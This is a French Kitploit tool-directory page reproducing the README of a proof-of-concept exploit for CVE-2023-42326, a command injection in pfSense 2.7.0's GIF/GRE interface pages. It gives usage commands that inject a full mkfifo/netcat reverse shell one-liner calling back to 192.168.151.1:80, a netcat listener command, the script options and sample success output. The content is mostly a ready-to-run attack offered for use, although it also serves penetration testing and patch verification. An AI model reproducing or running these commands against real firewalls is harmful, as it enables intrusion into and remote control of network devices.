Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-42326 — Ceci est un simple POC pour montrer la vulnérabilité d'injection de commande dans pfsense 2.7 (CVE-2023-42326) | Kitploit
Outils/GitHubGitHub/bl4ckarch/cve-2023-42326
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubbl4ckarch/cve-2023-42326

CVE-2023-42326

Ceci est un simple POC pour montrer la vulnérabilité d'injection de commande dans pfsense 2.7 (CVE-2023-42326)

Voir le dépôt
4il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit d'injection de commandes pfSense 2.7.0 (CVE-2023-42326)

Ce script Python est une preuve de concept (PoC) exploitant la vulnérabilité d'injection de commandes (CVE-2023-42326) dans pfSense 2.7.0. La vulnérabilité permet à des attaquants authentifiés d'injecter et d'exécuter des commandes arbitraires via les composants interfaces_gif_edit.php et interfaces_gre_edit.php.

Fonctionnalités

  • Sélection du mode d'exploit (gif ou gre) pour choisir les composants vulnérables.
  • Capacité d'injection de commandes pour exécuter des commandes shell arbitraires.
  • Gestion du reverse shell Netcat avec gestion automatique des threads.
  • Mode débogage pour une meilleure visibilité des données de requête.

Prérequis

Avant d'exécuter le script, assurez-vous d'avoir :

  • Python 3.x installé sur votre système.
  • Les bibliothèques Python requises installées :
    root@kitploit:~
    pip install requests beautifulsoup4 rich
    

Utilisation

Exemple de base (injection de commandes)

Cette commande injecte une commande shell qui crée un reverse shell vers votre machine :

root@kitploit:~
python3 exploit.py -u "admin" -p "pfsense" --mode "gif" -t "http://10.101.1.1" -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.151.1 80 > /tmp/f &"
  • -u : Nom d'utilisateur pour la connexion admin pfSense.
  • -p : Mot de passe pour la connexion admin pfSense.
  • --mode : Mode d'exploit (gif ou gre).
  • -t : URL cible de pfSense.
  • -c : La commande shell à injecter.
  • -d : (Facultatif) Active le mode débogage pour voir les données de réponse brutes.

Exemple de reverse shell

Assurez-vous d'avoir un listener Netcat en cours d'exécution sur votre machine :

root@kitploit:~
nc -lvnp 80

Ensuite, exécutez le script avec une commande de reverse shell comme celle-ci :

root@kitploit:~
python3 exploit.py -u "admin" -p "pfsense" --mode "gif" -t "http://10.101.1.1" -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.151.1 80 > /tmp/f &"  --insecure(for https without valid ssl)

GIF de démonstration

  1. Connexion à pfSense et exploitation de l'interface GIF

    Démo 1 - Interface GIF

  2. Exécution d'un reverse shell

    Démo 2 - Reverse shell

Options du script

Exemple de sortie

Lorsque l'exploit s'exécute avec succès, vous devriez voir une sortie similaire à celle-ci :

root@kitploit:~
██████╗ ███████╗██████╗ ██╗    ██╗███╗   ██╗███╗   ███╗███████╗
██╔══██╗██╔════╝██╔══██╗██║    ██║████╗  ██║████╗ ████║██╔════╝
██████╔╝█████╗  ██████╔╝██║ █╗ ██║██╔██╗ ██║██╔████╔██║█████╗  
██╔═══╝ ██╔══╝  ██╔═══╝ ██║███╗██║██║╚██╗██║██║╚██╔╝██║██╔══╝  
██║     ██║     ██║     ╚███╔███╔╝██║ ╚████║██║ ╚═╝ ██║███████╗
╚═╝     ╚═╝     ╚═╝      ╚══╝╚══╝ ╚═╝  ╚═══╝╚═╝     ╚═╝╚══════╝

Done with ❤️  by @bl4ckarch                                                            
[2024-10-24 03:57:59] [SUCCESS] Target http://10.101.1.1 is reachable
[2024-10-24 03:57:59] [INFO] Fetching CSRF token from: http://10.101.1.1/
[2024-10-24 03:57:59] [SUCCESS] CSRF token extracted successfully
[2024-10-24 03:57:59] [INFO] Sending GIF exploit request to http://10.101.1.1/interfaces_gif_edit.php
[2024-10-24 03:57:59] [SUCCESS] GIF Exploit sent successfully

Remarques

  • Exigence de privilèges : Vous devez disposer d'identifiants admin valides pour l'instance pfSense.
  • Système cible : Cet exploit est spécifique à pfSense 2.7.0.
  • Reverse shell : Assurez-vous que les paramètres de votre pare-feu autorisent les connexions entrantes sur le port spécifié lors de la mise en place d'un reverse shell.

Mode débogage

Si vous souhaitez voir plus de détails sur les requêtes envoyées, vous pouvez activer le mode débogage en ajoutant -d à votre commande. Cela affichera les données de réponse et vous aidera à résoudre les éventuels problèmes.

root@kitploit:~
python3 exploit.py -u "admin" -p 'pfsense' --mode 'gif' -t http://10.101.1.1 -c "your_command_here" -d --insecure(for https without valid ssl)

Dépannage

  • Assurez-vous que le système cible est joignable.
  • Vérifiez à nouveau les identifiants utilisés pour la connexion.
  • Utilisez l'option -d pour une journalisation plus détaillée si nécessaire.
Télécharger l’outil
ArgumentDescription
-uNom d'utilisateur pour la connexion admin pfSense.
-pMot de passe pour la connexion admin pfSense.
-tURL/adresse IP cible de pfSense (ex. : http://10.101.1.1).
--modeMode d'exploit : gif (pour interfaces_gif_edit.php) ou gre.
-cCommande à injecter dans le composant vulnérable.
-dFacultatif. Active le mode débogage pour afficher les données de réponse.